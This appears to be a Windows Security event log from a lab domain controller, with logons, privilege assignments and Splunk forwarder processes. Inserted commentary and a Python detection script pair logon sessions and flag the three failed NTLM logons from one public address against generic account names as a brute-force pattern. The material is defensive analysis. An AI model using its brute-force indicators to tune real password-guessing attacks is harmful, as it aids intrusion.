Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8837C4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264876
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88373E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264875
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88373E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53780
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264874
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88373E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264882
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x884304
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264881
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x884304
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53788
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:42:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264880
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x884304
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:43:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264883
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x560
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264885
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1300
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264884
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264886
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264887
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264889
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264888
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264892
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x887D77
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264891
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x887D77
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53802
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:43:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264890
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x887D77
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:44:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264894
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: POSTGRES
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264893
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: EXAM
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:02 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264895
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: WINADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.32
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
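Two things in the records above are worth turning into working checks. First, the 4634 text says a logoff "may be positively correlated with a logon event using the Logon ID value", with the caveat that Logon IDs are only unique between reboots of one host: the 4624 at 03:42:25 creates session 0x88373E for WIN-DC-209$ (Kerberos, from a link-local address on the DC itself) and the 4634 with the same Logon ID closes it, but the 4624 carries that ID under New Logon while the 4634 carries it under Subject, and the Subject block of the 4624 has its own Logon ID of 0x0, so a parser that keys on the bare field name loses one of them. Second, the three Audit Failure 4625 events from 193.169.255.32 hit POSTGRES, EXAM and WINADMIN within two seconds over NTLM with Status 0xC000006D and Sub Status 0xC0000064, which means the account name does not exist (a wrong password for a real account would give Sub Status 0xC000006A); several non-existent generic names from one public address in quick succession is the shape of a wordlist brute force against an exposed service, not a user mistyping a password.

The Python below is an added example written for this page, not Splunk's or Microsoft's code. It parses the multi-line layout the forwarder emits here (Key=Value header lines, then the Message body whose group headers such as Subject: and New Logon: reuse field names), pairs 4624/4634 events by (ComputerName, Logon ID), and lists source addresses whose failures tried several non-existent names. The SAMPLE text is constructed by cutting the page's own events down to the fields the checks read; the SECTIONS list, the "This event is generated" skip marker and the min_users=3 threshold are this example's assumptions, not anything the log format guarantees.

```python
import re
from collections import defaultdict

# Constructed sample, cut down from this page's events (not a real capture).
LOGON_PAIR = """\
04/19/2021 03:42:25 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Message=An account was successfully logged on.
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x88373E
04/19/2021 03:42:25 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Message=An account was logged off.
Subject:
Logon ID: 0x88373E
"""
FAILED_LOGON = """\
04/19/2021 03:44:0{sec} PM
EventCode=4625
ComputerName=win-dc-209.attackrange.local
Message=An account failed to log on.
Account For Which Logon Failed:
Account Name: {user}
Account Domain:
Failure Information:
Sub Status: 0xC0000064
Network Information:
Source Network Address: 193.169.255.32
Detailed Authentication Information:
Authentication Package: NTLM
This event is generated when a logon request fails.
"""
SAMPLE = LOGON_PAIR + "".join(FAILED_LOGON.format(sec=s, user=u) for s, u in
                              ((1, "POSTGRES"), (1, "EXAM"), (2, "WINADMIN")))

TS_RE = re.compile(r"^\d\d/\d\d/\d{4} \d\d:\d\d:\d\d [AP]M$")
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 ()]*?):(?:\s+(.*))?$")
# Group headers in the message (assumed list); a bare "Key:" not in it is an empty field.
SECTIONS = {"Subject", "Creator Subject", "Target Subject", "Logon Information",
            "New Logon", "Process Information", "Network Information", "Failure Information",
            "Detailed Authentication Information", "Account For Which Logon Failed"}
# Microsoft's explanatory paragraph follows the structured body; skip it.
DESCRIPTION = ("This event is generated", "Token Elevation Type indicates")

def parse_events(text):
    """Events as {'time', 'header', 'fields'}; fields are keyed (section, name),
    so the Subject and New Logon 'Logon ID' values do not overwrite each other."""
    events, ev, section, in_body, skip = [], None, "", False, False
    for line in (raw.strip() for raw in text.splitlines()):
        if TS_RE.match(line):                        # a new event starts here
            events.append(ev := {"time": line, "header": {}, "fields": {}})
            section, in_body, skip = "", False, False
        elif ev is None or not line or skip:
            continue
        elif not in_body:                            # Key=Value header lines
            key, _, val = line.partition("=")
            ev["header"][key] = val
            in_body = key == "Message"
        elif line.startswith(DESCRIPTION):
            skip = True
        elif (m := FIELD_RE.match(line)) and not m.group(2) and m.group(1) in SECTIONS:
            section = m.group(1)
        elif m:                                      # lines without a colon are dropped
            ev["fields"][(section, m.group(1))] = (m.group(2) or "").strip()
    return events

def field(ev, name, section=None):
    """First value called `name`, optionally only from one section."""
    return next((v for (s, k), v in ev["fields"].items()
                 if k == name and section in (None, s)), None)

def pair_logon_sessions(events):
    """(host, Logon ID) -> {'logon': 4624, 'logoff': 4634}. Logon IDs are unique
    only between reboots of one host, so ComputerName is part of the key."""
    sessions = defaultdict(lambda: {"logon": None, "logoff": None})
    for ev in events:
        code, host = ev["header"].get("EventCode"), ev["header"].get("ComputerName")
        if code == "4624":
            sessions[host, field(ev, "Logon ID", "New Logon")]["logon"] = ev
        elif code == "4634":
            sessions[host, field(ev, "Logon ID", "Subject")]["logoff"] = ev
    return dict(sessions)

def spray_sources(events, min_users=3):
    """Source address -> sorted distinct account names behind NTLM 4625s with Sub
    Status 0xC0000064 (no such account), for sources that tried >= min_users."""
    names = defaultdict(set)
    for ev in events:
        if (ev["header"].get("EventCode") == "4625"
                and field(ev, "Authentication Package") == "NTLM"
                and field(ev, "Sub Status", "Failure Information") == "0xC0000064"):
            names[field(ev, "Source Network Address")].add(
                field(ev, "Account Name", "Account For Which Logon Failed"))
    return {src: sorted(u) for src, u in names.items() if len(u) >= min_users}
```

Run over a full export, pair_logon_sessions also surfaces 4624 events with no 4634 (sessions still open, or never closed before the window ended) and 4634 events with no 4624 (the session began before collection started or before a reboot, which is why the host and reboot caveat matters). The 4688 records on this page, splunkd.exe spawning the splunk-*.exe helpers under Logon ID 0x3E7 (the SYSTEM logon session), are the forwarder's normal baseline and nothing in these checks touches them.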
04/19/2021 03:44:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264896
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1450
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
